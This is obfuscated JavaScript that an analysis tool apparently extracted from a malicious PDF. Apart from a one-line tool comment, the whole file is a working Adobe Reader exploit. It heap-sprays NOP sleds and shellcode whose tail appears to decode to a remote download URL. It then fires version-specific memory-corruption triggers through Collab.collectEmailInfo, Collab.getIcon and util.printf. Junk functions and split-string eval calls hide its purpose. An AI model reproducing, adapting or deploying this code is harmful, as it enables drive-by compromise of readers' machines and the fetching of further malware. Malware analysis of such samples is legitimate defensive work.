// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%u', '4343%u4', '343%u0FE', 'B%u335B', '%u66C', '9%u80B9%', 'u8001%uE', 'F33%u', 'E243%', 'uEBFA%', 'uE805', '%uFFEC', '%uFFF', 'F%u8B7F', '%uDF4E%', 'uEFEF%u', '64EF%u', 'E3AF%', 'u9F64%u4', '2F3%u9F', '64%u6EE7', '%uEF03', '%uEFEB%', 'u64EF%uB', '903%u', '6187%uE1', 'A1%u0703', '%uEF11', '%uEFE', 'F%uAA66', '%uB9EB%u', '7787%u', '6511%', 'u07E1', '%uEF1F', '%uEFEF%u', 'AA66%uB9', 'E7%uC', 'A87%u105', 'F%u072D', '%uEF0D%u', 'EFEF%u', 'AA66%uB', '9E3%u00', '87%u0F', '21%u078F', '%uEF3B%u', 'EFEF%uA', 'A66%uB9F', 'F%u2E8', '7%u0A', '96%u0', '757%uEF', '29%uEFEF', '%uAA66', '%uAFFB%u', 'D76F%u', '9A2C%u66', '15%uF7A', 'A%uE8', '06%uEF', 'EE%uB', '1EF%u9', 'A66%u', '64CB%', 'uEBAA%uE', 'E85%u64B', '6%uF7BA', '%u07B', '9%uEF64%', 'uEFEF%', 'u87BF', '%uF5D', '9%u9F', 'C0%u7807', '%uEFEF%u', '66EF%uF', '3AA%u', '2A64%u', '2F6C%', 'u66BF%uC', 'FAA%u10', '87%uEF', 'EF%uB', 'FEF%uA', 'A64%u', '85FB%uB', '6ED%uB', 'A64%u0', '7F7%uE', 'F8E%uE', 'FEF%u', 'AAEC%u2', '8CF%uB3', 'EF%uC191', '%u288', 'A%uEB', 'AF%u8A9', '7%uEFEF', '%u9A10%u', '64CF%uE', '3AA%uEE', '85%u64B', '6%uF7BA%', 'uAF07%', 'uEFEF%', 'u85EF', '%uB7E', '8%uAAEC%', 'uDCCB%uB', 'C34%u', '10BC%', 'uCF9A%uB', 'CBF%uA', 'A64%u85', 'F3%uB6EA', '%uBA64', '%u07F7%', 'uEFCC', '%uEFEF', '%uEF8', '5%u9A10%', 'u64CF%', 'uE7AA%uE', 'D85%u64', 'B6%uF7BA', '%uFF0', '7%uEFE', 'F%u85EF', '%u6410', '%uFFAA%', 'uEE85%', 'u64B6%u', 'F7BA%u', 'EF07%', 'uEFEF%uA', 'EEF%uB', 'DB4%u0EE', 'C%u0EE', 'C%u0E', 'EC%u0EEC', '%u036', 'C%uB5E', 'B%u64BC%', 'u0D35', '%uBD18%', 'u0F10%u', '64BA%', 'u6403', '%uE792%u', 'B264%', 'uB9E3', '%u9C64%u', '64D3%uF1', '9B%uEC9', '7%uB91C%', 'u9964%', 'uECCF', '%uDC1C', '%uA626%', 'u42AE%u2', 'CEC%u', 'DCB9%', 'uE019', '%uFF5', '1%u1DD', '5%uE7', '9B%u212E', '%uECE2%u', 'AF1D%u1', 'E04%u', '11D4%u', '9AB1%', 'uB50A', '%u0464%', 'uB564%uE', 'CCB%u893', '2%uE364', '%u64A4', '%uF3B5', '%u32E', 'C%uEB6', '4%uEC64%', 'uB12A%u', '2DB2%uEF', 'E7%u1', 'B07%u1', '011%uBA1', '0%uA3', 'BD%uA0A', '2%uEFA', '1%u7468', '%u707', '4%u2F3A', '%u772', 'F%u726F%', 'u646C%u', '6977%u6', '564%u7', '52D%u', '6173%u63', '2E%u6D6', 'F%u772F%', 'u6265', '%u6C61%', 'u7A69%u', '7265%u', '6C2F%', 'u6E61%u', '6964%u67', '6E%u652', 'F%u657', '8%u70', '2E%u70', '68%u783', 'F%u70', '3D%u666', '4');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

